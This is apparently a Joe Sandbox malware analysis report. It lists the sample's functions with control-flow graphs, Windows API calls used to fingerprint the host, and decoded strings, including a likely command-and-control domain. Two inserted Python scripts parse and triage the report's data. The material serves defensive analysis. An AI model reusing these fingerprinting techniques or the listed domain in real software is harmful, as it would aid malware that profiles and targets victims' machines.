                                                                                                          • Instruction Fuzzy Hash: 41F06572A44564EFCB219F54DC44F5DBBE8F708B14F048626E81293790DB7DA9008BD4
                                                                                                          APIs
                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00713F67
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                                          • String ID: InitializeCriticalSectionEx$&p
                                                                                                          • API String ID: 2593887523-2196734458
                                                                                                          • Opcode ID: 8281a07baf85c603b8e6f4ed81e680d083b9ffd808f4b8a4c793edf80e82f7ee
                                                                                                          • Instruction ID: edfc7435f95a602f5113fd715ab9849856b452a0742cea87ca3e5cc7730f87e8
                                                                                                          • Opcode Fuzzy Hash: 8281a07baf85c603b8e6f4ed81e680d083b9ffd808f4b8a4c793edf80e82f7ee
                                                                                                          • Instruction Fuzzy Hash: 58E09271585228B7CF212F58DC05DDE3F25EB40B60B008020F918151A0C67A8AA1E680
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Alloc
                                                                                                          • String ID: FlsAlloc$&p
                                                                                                          • API String ID: 2773662609-1467455382
                                                                                                          • Opcode ID: 838ded46b62e4220e9a88b48e4b5345b85c012c965b4c4fe9ec7fee1f7e8273a
                                                                                                          • Instruction ID: a64e820670b1baa84581b6ed8aab62747cc0a12ffa5f03f6880354c40370659a
                                                                                                          • Opcode Fuzzy Hash: 838ded46b62e4220e9a88b48e4b5345b85c012c965b4c4fe9ec7fee1f7e8273a
                                                                                                          • Instruction Fuzzy Hash: 8AE0C271784338B38B346699BC0AEEE7D15DB40B70B008130FD09612D1D9AD5E91D2D9

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:16.1%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:46.3%
                                                                                                          Total number of Nodes:529
                                                                                                          Total number of Limit Nodes:43

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C,00000000), ref: 00435D88
                                                                                                          • SysAllocString.OLEAUT32(3<), ref: 00435E22
                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435E60
                                                                                                          • SysAllocString.OLEAUT32(3<), ref: 00435EBB
                                                                                                          • SysAllocString.OLEAUT32(D793D587), ref: 00435F80
                                                                                                          • VariantInit.OLEAUT32(lefg), ref: 00435FEB
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00436149
                                                                                                          • SysFreeString.OLEAUT32 ref: 0043616C
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00436172
                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0043617F
                                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,9F4D9D79,00000000,00000000,00000000,00000000), ref: 004361B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                          • String ID: 3<$@!H#$D%`'$J9e;$a-N/$lefg$z)e+$~=w?
                                                                                                          • API String ID: 2573436264-614847132
                                                                                                          • Opcode ID: aa41e92751e4ad253c5f1a9c683b43f2ce376066fa649893cf1af7fd8abf9e82
                                                                                                          • Instruction ID: 27ff078a4b010ea1a9290b23d64d5601a8c120cf7f7afa5e5ced33b88d3c7e24
                                                                                                          • Opcode Fuzzy Hash: aa41e92751e4ad253c5f1a9c683b43f2ce376066fa649893cf1af7fd8abf9e82
                                                                                                          • Instruction Fuzzy Hash: B32221726083009FD314CF28C885B5BBBE6EFC9314F19992DE995873A2D779D805CB86

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !h=j$#HiJ$+p:r$0xz$2lMn$V(v*$ep$sT+V${$R&$~,s.$|+~
                                                                                                          • API String ID: 0-1833152483
                                                                                                          • Opcode ID: c195b33de5a408b3cc8a918af6e40a89a6b5ff3033b9111d650288c95cdd91a2
                                                                                                          • Instruction ID: daa0f7465a0f9da4cdcdf7ddd26bc493a1dc22f5afff9cae4a57350bad4ce2c5
                                                                                                          • Opcode Fuzzy Hash: c195b33de5a408b3cc8a918af6e40a89a6b5ff3033b9111d650288c95cdd91a2
                                                                                                          • Instruction Fuzzy Hash: FDB1FDB08153408FE3549F168A89FA67FB1FB41610F1A82E8D6892F376C7359046CF99
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (+5=$_[\]$c;!3$k
                                                                                                          • API String ID: 0-739136296
                                                                                                          • Opcode ID: 0a98b8fb954435193cf11548583325256e5af4390f98cf0942261ce7db7d7155
                                                                                                          • Instruction ID: be5394ba620d37c46f93c1f86b7fdf0f292fa23c8a19d15e325f42d15eb26972
                                                                                                          • Opcode Fuzzy Hash: 0a98b8fb954435193cf11548583325256e5af4390f98cf0942261ce7db7d7155
                                                                                                          • Instruction Fuzzy Hash: 2CD204B1A083419FD724DF14D8917EBB7A2EFD5304F19892EE4D987391EB389841CB86

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 826 42bb35-42bb8f call 43b710 GetComputerNameExA 829 42bb90-42bbc2 826->829 829->829 830 42bbc4-42bbce 829->830 831 42bbd0-42bbd7 830->831 832 42bbeb-42bbf8 830->832 835 42bbe0-42bbe9 831->835 833 42bbfa-42bc01 832->833 834 42bc1b-42bc6f GetComputerNameExA 832->834 836 42bc10-42bc19 833->836 837 42bc70-42bc97 834->837 835->832 835->835 836->834 836->836 837->837 838 42bc99-42bca3 837->838 839 42bca5-42bcaf 838->839 840 42bcbb-42bcc8 838->840 841 42bcb0-42bcb9 839->841 842 42bcca-42bcd1 840->842 843 42bceb-42bd3a 840->843 841->840 841->841 844 42bce0-42bce9 842->844 846 42bd40-42bdaa 843->846 844->843 844->844 846->846 847 42bdac-42bdb6 846->847 848 42bdcb-42bdd8 847->848 849 42bdb8-42bdbf 847->849 851 42bdda-42bde1 848->851 852 42bdfb-42be5b call 43b710 848->852 850 42bdc0-42bdc9 849->850 850->848 850->850 853 42bdf0-42bdf9 851->853 857 42be60-42be97 852->857 853->852 853->853 857->857 858 42be99-42bea3 857->858 859 42bea5-42beaf 858->859 860 42bebb-42becb 858->860 861 42beb0-42beb9 859->861 862 42bed1-42bed8 860->862 863 42c00c-42c05f 860->863 861->860 861->861 864 42bee0-42bef1 862->864 865 42c060-42c0d4 863->865 866 42bef3-42bef8 864->866 867 42bf00-42bf06 864->867 865->865 868 42c0d6-42c0e4 865->868 869 42bf22 866->869 870 42bf50-42bf60 867->870 871 42bf08-42bf0b 867->871 872 42c0e6-42c0ef 868->872 873 42c0fb-42c0fe call 42f730 868->873 875 42bf26-42bf28 869->875 878 42bf62-42bf65 870->878 879 42bfba-42bfc2 870->879 871->870 874 42bf0d-42bf1f 871->874 876 42c0f0-42c0f9 872->876 881 42c103-42c123 873->881 874->869 880 42bf2a-42bf35 875->880 876->873 876->876 878->879 882 42bf67-42bfb5 878->882 883 42bfc4-42bfc8 879->883 884 42bfcd-42bfd2 879->884 880->863 887 42bf3b-42bf3d 880->887 882->875 883->880 885 42bfd4-42c000 884->885 886 42c005-42c007 884->886 885->869 886->869 887->864 888 42bf3f 887->888 888->863
                                                                                                          APIs
                                                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042BB69
                                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042BC3D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ComputerName
                                                                                                          • String ID: ?$ORVM$k
                                                                                                          • API String ID: 3545744682-55357630
                                                                                                          • Opcode ID: 73dfd37667851e74edda8fc3058c4e3f1f03dbc8d35f20561cfc2b0e77526a58
                                                                                                          • Instruction ID: a29b1076b5d534e7c869dd0889cae0e0c31f9b92cc7d3506e2fb745c9de056f1
                                                                                                          • Opcode Fuzzy Hash: 73dfd37667851e74edda8fc3058c4e3f1f03dbc8d35f20561cfc2b0e77526a58
                                                                                                          • Instruction Fuzzy Hash: FCF109316083908ED735CF3994917ABBBE2EF93304F49855ED4D99B382CB398506CB96

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 889 408450-408461 call 4399d0 892 408467-40848f call 407e80 889->892 893 40878f-408791 ExitProcess 889->893 896 408490-4084ac 892->896 897 4084c6-4084d8 call 433260 896->897 898 4084ae-4084c4 896->898 901 408778-40877f 897->901 902 4084de-408516 GetCurrentProcessId GetCurrentThreadId 897->902 898->896 903 408781-408787 call 407e90 901->903 904 40878a call 439dd0 901->904 905 408518-40851b 902->905 906 40851d-408527 902->906 903->904 904->893 907 408529-40868d SHGetSpecialFolderPathW GetForegroundWindow 905->907 906->907 910 408693-408713 907->910 911 408715-40876c call 409a00 907->911 910->911 911->901 915 40876e call 40cb90 911->915 917 408773 call 40b710 915->917 917->901
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004084DE
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004084E8
                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408670
                                                                                                          • GetForegroundWindow.USER32 ref: 00408685
                                                                                                          • ExitProcess.KERNEL32 ref: 00408791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4063528623-0
                                                                                                          • Opcode ID: c353894f50ce8972ad68c2fd857375105b19d1d075451e42aa21559e8c926ac0
                                                                                                          • Instruction ID: 9667fcc959b4b6dc1b54f54df87a9097397fe8c2a1fd8efcf39382a549e4d989
                                                                                                          • Opcode Fuzzy Hash: c353894f50ce8972ad68c2fd857375105b19d1d075451e42aa21559e8c926ac0
                                                                                                          • Instruction Fuzzy Hash: 69813773F04B144BC318AE6DCD85256B6C69BC4720F1F863EA995EB3D1EDB89C044689
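The control_flow_graph line of this function is the text form of the graph image: a block id followed by its address range (or a single address), optional "call <addr>" internal call targets, Windows API names (with "* N" when the same API is called N times in the block) and "a->b" edges. The script below is an added example written for this edit, not Joe Sandbox code and not code from the sample: it parses such a dump into basic blocks and edges and uses Tarjan's strongly-connected-components algorithm to list the loops, which is the first place to look when hunting the string-decryption routines this report flags (single-block loops appear as self-edges such as 829->829 in the GetComputerNameExA graph). The token grammar is inferred from the dumps on this page; the sample input is this function's own graph, copied verbatim.

```python
"""Added example (not from Joe Sandbox or the analysed sample): parse a Joe Sandbox
control_flow_graph text dump into blocks and edges, then find its loops."""
import re
from dataclasses import dataclass, field

# Constructed sample input: the ExitProcess function's graph, copied from this report.
SAMPLE_CFG = (
    "control_flow_graph 889 408450-408461 call 4399d0 892 408467-40848f call 407e80 "
    "889->892 893 40878f-408791 ExitProcess 889->893 896 408490-4084ac 892->896 "
    "897 4084c6-4084d8 call 433260 896->897 898 4084ae-4084c4 896->898 "
    "901 408778-40877f 897->901 902 4084de-408516 GetCurrentProcessId GetCurrentThreadId "
    "897->902 898->896 903 408781-408787 call 407e90 901->903 904 40878a call 439dd0 "
    "901->904 905 408518-40851b 902->905 906 40851d-408527 902->906 903->904 904->893 "
    "907 408529-40868d SHGetSpecialFolderPathW GetForegroundWindow 905->907 906->907 "
    "910 408693-408713 907->910 911 408715-40876c call 409a00 907->911 910->911 "
    "911->901 915 40876e call 40cb90 911->915 917 408773 call 40b710 915->917 917->901"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")                      # "a->b"
ADDR = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")      # "start-end" or "addr"


@dataclass
class Block:
    bid: int
    start: int
    end: int                                     # equals start for single-address blocks
    calls: list = field(default_factory=list)    # internal call targets (addresses)
    apis: list = field(default_factory=list)     # Windows API names, one entry per call


def parse_cfg(text):
    """Token grammar inferred from the report: id range | call addr | Api [* N] | a->b."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        em = EDGE.match(tok)
        if em:                                        # control-flow edge
            edges.append((int(em.group(1)), int(em.group(2))))
            i += 1
        elif tok == "call" and ADDR.match(nxt):       # internal call target
            cur.calls.append(int(nxt, 16))
            i += 2
        elif tok == "*" and nxt.isdigit():            # "<Api> * N": repeat last API N times
            cur.apis.extend([cur.apis[-1]] * (int(nxt) - 1))
            i += 2
        elif tok.isdigit() and ADDR.match(nxt):       # new basic block
            am = ADDR.match(nxt)
            start = int(am.group(1), 16)
            end = int(am.group(2), 16) if am.group(2) else start
            cur = Block(int(tok), start, end)
            blocks[cur.bid] = cur
            i += 2
        else:                                         # anything else is an API name
            cur.apis.append(tok)
            i += 1
    return blocks, edges


def loops(blocks, edges):
    """Loops = strongly connected components of size > 1, plus blocks with a self-edge."""
    succ = {b: [] for b in blocks}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    index, low, on_stack, stack, result, counter = {}, {}, set(), [], [], [0]

    def strongconnect(v):                             # Tarjan's algorithm
        index[v] = low[v] = counter[0]
        counter[0] += 1
        stack.append(v)
        on_stack.add(v)
        for w in succ.get(v, []):
            if w not in index:
                strongconnect(w)
                low[v] = min(low[v], low[w])
            elif w in on_stack:
                low[v] = min(low[v], index[w])
        if low[v] == index[v]:
            comp = set()
            while True:
                w = stack.pop()
                on_stack.discard(w)
                comp.add(w)
                if w == v:
                    break
            if len(comp) > 1 or (v, v) in edges:
                result.append(comp)

    for v in blocks:
        if v not in index:
            strongconnect(v)
    return result


def api_blocks(blocks):
    """Map block id -> API names for the blocks that call out to Windows APIs."""
    return {bid: b.apis for bid, b in blocks.items() if b.apis}


if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE_CFG)
    print("%d blocks, %d edges" % (len(blocks), len(edges)))
    for comp in loops(blocks, edges):
        print("loop over blocks", sorted(comp), "at", ["0x%x" % blocks[b].start for b in sorted(comp)])
    for bid, apis in api_blocks(blocks).items():
        print("block %d @ 0x%x calls %s" % (bid, blocks[bid].start, ", ".join(apis)))
```

For this graph the only loop is the two-block cycle 896<->898 (0x408490 and 0x4084ae); larger functions in this report show many self-edges, and sorting those by block size is a quick way to shortlist the decryption loops before opening the dump in IDA.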

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 981 42c273-42c298 982 42c2a0-42c2c5 981->982 982->982 983 42c2c7-42c2d1 982->983 984 42c2d3-42c2da 983->984 985 42c2eb-42c2f7 983->985 986 42c2e0-42c2e9 984->986 987 42c311-42c35b call 43b710 GetPhysicallyInstalledSystemMemory call 41ddb0 985->987 988 42c2f9-42c2fb 985->988 986->985 986->986 994 42c360-42c37a 987->994 989 42c300-42c30d 988->989 989->989 991 42c30f 989->991 991->987 995 42c380-42c3aa 994->995 995->995 996 42c3ac-42c3df 995->996 997 42c3e0-42c419 996->997 997->997 998 42c41b-42c425 997->998 999 42c427-42c432 998->999 1000 42c44d 998->1000 1001 42c440-42c449 999->1001 1002 42c451-42c459 1000->1002 1001->1001 1003 42c44b 1001->1003 1004 42c46b-42c478 1002->1004 1005 42c45b-42c45f 1002->1005 1003->1002 1007 42c47a-42c481 1004->1007 1008 42c49b-42c4f1 1004->1008 1006 42c460-42c469 1005->1006 1006->1004 1006->1006 1009 42c490-42c499 1007->1009 1010 42c500-42c53c 1008->1010 1009->1008 1009->1009 1010->1010 1011 42c53e-42c548 1010->1011 1012 42c54a-42c551 1011->1012 1013 42c56b-42c578 1011->1013 1016 42c560-42c569 1012->1016 1014 42c57a-42c581 1013->1014 1015 42c59b-42c641 1013->1015 1017 42c590-42c599 1014->1017 1016->1013 1016->1016 1017->1015 1017->1017
                                                                                                          APIs
                                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C340
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                                          • String ID: 1;28$@DrE
                                                                                                          • API String ID: 3960555810-323544097
                                                                                                          • Opcode ID: 0f8b194f0c21809f1514294f958e23905b7d033346f1951e53f3f900afccc97f
                                                                                                          • Instruction ID: e90a8db1dd24a847bce801572203e7e30b4ca81ec031bd0f445cdaf47bf252ba
                                                                                                          • Opcode Fuzzy Hash: 0f8b194f0c21809f1514294f958e23905b7d033346f1951e53f3f900afccc97f
                                                                                                          • Instruction Fuzzy Hash: 7291C570A0C3A18FD725CF2990607ABBBE0AFD7304F58896ED4DD97382D6398405CB96
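Decoding the raw hexadecimal arguments printed for this function and for the GetComputerNameExA function above: the two GetComputerNameExA calls pass NameType 6 and 5, which in the COMPUTER_NAME_FORMAT enumeration are ComputerNamePhysicalDnsDomain and ComputerNamePhysicalDnsHostname, and the SHGetSpecialFolderPathW call in the ExitProcess function passes csidl 0x10, CSIDL_DESKTOPDIRECTORY. The script below is an added example written for this edit, not Joe Sandbox code and not code from the sample: it parses API-call lines in the exact shape this report prints them, decodes those enumerations and tags the host-fingerprinting calls (GetComputerNameExA, GetPhysicallyInstalledSystemMemory, GetSystemMetrics, GetLogicalDrives). It assumes the sandbox prints arguments in declaration order, as these lines suggest, and that "?" marks a value it could not recover; the FINGERPRINT_APIS labels are this editor's triage labels, not Joe Sandbox signature names. The sample input is constructed from the API lines on this page.

```python
"""Added example (not from Joe Sandbox or the analysed sample): parse the report's
"APIs" lines, decode enumeration arguments and tag host-fingerprinting calls."""
import re
from dataclasses import dataclass

# Constructed sample input: API lines copied from this report's function entries.
SAMPLE_API_LINES = """
• GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042BB69
• GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042BC3D
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C340
• GetCurrentProcessId.KERNEL32 ref: 004084DE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408670
• ExitProcess.KERNEL32 ref: 00408791
"""

# Line shapes seen in the report:
#   • Api.Module(arg,arg,...), ref: 0040XXXX
#   • Api.Module ref: 0040XXXX
API_LINE = re.compile(
    r"^(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# COMPUTER_NAME_FORMAT (sysinfoapi.h): decodes GetComputerNameExA's NameType argument.
COMPUTER_NAME_FORMAT = {
    0: "ComputerNameNetBIOS",
    1: "ComputerNameDnsHostname",
    2: "ComputerNameDnsDomain",
    3: "ComputerNameDnsFullyQualified",
    4: "ComputerNamePhysicalNetBIOS",
    5: "ComputerNamePhysicalDnsHostname",
    6: "ComputerNamePhysicalDnsDomain",
    7: "ComputerNamePhysicalDnsFullyQualified",
}

# A few CSIDL values (shlobj_core.h): decodes SHGetSpecialFolderPathW's csidl argument.
CSIDL = {
    0x05: "CSIDL_PERSONAL",
    0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
}

# Triage labels chosen for this example; they are not Joe Sandbox signature names.
FINGERPRINT_APIS = {
    "GetComputerNameExA": "host identity (computer / domain name)",
    "GetPhysicallyInstalledSystemMemory": "hardware profile (installed RAM, a common VM check)",
    "GetSystemMetrics": "display profile (screen metrics, a common VM check)",
    "GetLogicalDrives": "drive enumeration",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list  # one int per argument, or None where the report prints '?'
    ref: int    # address of the call site


def parse_arg(token):
    token = token.strip()
    return None if token in ("", "?") else int(token, 16)


def parse_api_lines(text):
    """Parse every line matching the report's API-call shape; ignore all other lines."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None or raw.strip() == "" else [parse_arg(a) for a in raw.split(",")]
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def annotate(call):
    """Decode enumeration-typed arguments, assuming they are printed in declaration order."""
    if call.api == "GetComputerNameExA" and call.args and call.args[0] is not None:
        return COMPUTER_NAME_FORMAT.get(call.args[0], "NameType=%d" % call.args[0])
    if call.api == "SHGetSpecialFolderPathW" and len(call.args) >= 3 and call.args[2] is not None:
        return CSIDL.get(call.args[2], "csidl=0x%x" % call.args[2])
    return ""


def triage(text):
    """Return (call site, api, decoded argument, label) for each fingerprinting call."""
    rows = []
    for call in parse_api_lines(text):
        label = FINGERPRINT_APIS.get(call.api)
        if label:
            rows.append((call.ref, call.api, annotate(call), label))
    return rows


if __name__ == "__main__":
    for ref, api, decoded, label in triage(SAMPLE_API_LINES):
        print("0x%08x %-36s %-32s %s" % (ref, api, decoded, label))
```

Run against the whole report text rather than the constructed sample to get every decoded call site in one table; the two NameType values explain why the sandbox tags the function with "ComputerName" while the sample actually collects the physical DNS domain and hostname, a pair that lets an operator distinguish a domain-joined victim from a bare analysis VM.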

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 1041 431a20-431b01 call 413f60 GetSystemMetrics * 2 1049 431b08-431b99 1041->1049
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                          • Opcode ID: 82e9c184c72eb2c3017187d96860f3a05c1327615be25ec44bc7f72acb1adda6
                                                                                                          • Instruction ID: 8f896a56011e874f0ac22bb7d3ffd9ac1f0091449a08859568974d1ee2c6626f
                                                                                                          • Opcode Fuzzy Hash: 82e9c184c72eb2c3017187d96860f3a05c1327615be25ec44bc7f72acb1adda6
                                                                                                          • Instruction Fuzzy Hash: 345165B4D142189FDB40EFACD985A9DBBF0BF48300F11852AE899E7350D734A949CF96

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 1072 40cd9c-40cdaf 1073 40cdb0-40cdd6 1072->1073 1073->1073 1074 40cdd8-40ce03 call 4083d0 1073->1074 1077 40ce10-40ce7a 1074->1077 1077->1077 1078 40ce7c-40cebf 1077->1078 1079 40cec0-40ced2 1078->1079 1079->1079 1080 40ced4-40cedf 1079->1080 1081 40cee1-40cee5 1080->1081 1082 40cefb-40cf03 1080->1082 1083 40cef0-40cef9 1081->1083 1084 40cf05-40cf06 1082->1084 1085 40cf1b-40cf26 1082->1085 1083->1082 1083->1083 1086 40cf10-40cf19 1084->1086 1087 40cf28-40cf29 1085->1087 1088 40cf3b-40cf49 1085->1088 1086->1085 1086->1086 1089 40cf30-40cf39 1087->1089 1090 40cf5b-40d01f 1088->1090 1091 40cf4b-40cf4f 1088->1091 1089->1088 1089->1089 1093 40d020-40d03e 1090->1093 1092 40cf50-40cf59 1091->1092 1092->1090 1092->1092 1093->1093 1094 40d040-40d069 1093->1094 1095 40d070-40d0a0 1094->1095 1095->1095 1096 40d0a2-40d0ba call 40b740 1095->1096 1098 40d0bf-40d0e0 1096->1098
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: F^$I@$wordyfindy.lat
                                                                                                          • API String ID: 0-4220062908
                                                                                                          • Opcode ID: a32a9dc7eeddbedd839400483b8a8f963e09df8e8f66ea590f5c168d3f478726
                                                                                                          • Instruction ID: 75eab1f800014c43d20e1d7ee47c841900a1d79cf133a7cb46caa78cff4b730e
                                                                                                          • Opcode Fuzzy Hash: a32a9dc7eeddbedd839400483b8a8f963e09df8e8f66ea590f5c168d3f478726
                                                                                                          • Instruction Fuzzy Hash: 7191F3B1504B418FD725CF25C4D0222BBA2FF96304B2896ADC8D65F79AC739E847CB94

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 1099 422b70-422bc6 1100 422bd0-422c01 1099->1100 1100->1100 1101 422c03-422c47 1100->1101 1103 422c50-422c79 1101->1103 1103->1103 1104 422c7b-422c85 1103->1104 1105 422cc3 1104->1105 1106 422e20-422e29 1104->1106 1107 422e10-422e17 1104->1107 1108 422ce1-422cea 1104->1108 1109 422cd4-422ce0 1104->1109 1110 422ccb-422cd1 call 407e90 1104->1110 1111 422c8c-422c92 1104->1111 1105->1110 1114 422e32 1106->1114 1115 422e2b-422e30 1106->1115 1107->1106 1112 422cf3 1108->1112 1113 422cec-422cf1 1108->1113 1110->1109 1116 422c94-422c99 1111->1116 1117 422c9b 1111->1117 1120 422cfa-422d38 call 407e80 1112->1120 1113->1120 1121 422e39-422edf call 407e80 1114->1121 1115->1121 1122 422c9e-422cbc call 407e80 1116->1122 1117->1122 1129 422d40-422d99 1120->1129 1130 422ee0-422ef2 1121->1130 1122->1105 1122->1106 1122->1107 1122->1108 1122->1109 1122->1110 1129->1129 1131 422d9b-422da7 1129->1131 1130->1130 1132 422ef4-422efc 1130->1132 1134 422dc1-422dcd 1131->1134 1135 422da9-422daf 1131->1135 1136 422f21-422f2d 1132->1136 1137 422efe-422f05 1132->1137 1139 422df1-422dfc call 43ce50 1134->1139 1140 422dcf-422dd3 1134->1140 1138 422db0-422dbf 1135->1138 1142 422f51-422f71 GetLogicalDrives call 43ce50 1136->1142 1143 422f2f-422f33 1136->1143 1141 422f10-422f1f 1137->1141 1138->1134 1138->1138 1148 422e01-422e09 1139->1148 1147 422de0-422def 1140->1147 1141->1136 1141->1141 1150 4231d3 1142->1150 1151 422f78-422f82 1142->1151 1145 422f40-422f4f 1143->1145 1145->1142 1145->1145 1147->1139 1147->1147 1148->1106 1148->1107 1150->1150 1151->1150
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: hj
                                                                                                          • API String ID: 0-289319137
                                                                                                          • Opcode ID: 06092fb294515c55c5d4a3f5c3932efb0bbda3695c8d00682d9ae413fd06b1e2
                                                                                                          • Instruction ID: 6db4e12933fac9534df6dc46ac26008168cc2cc32e36c67cb0ae1687d387ca35
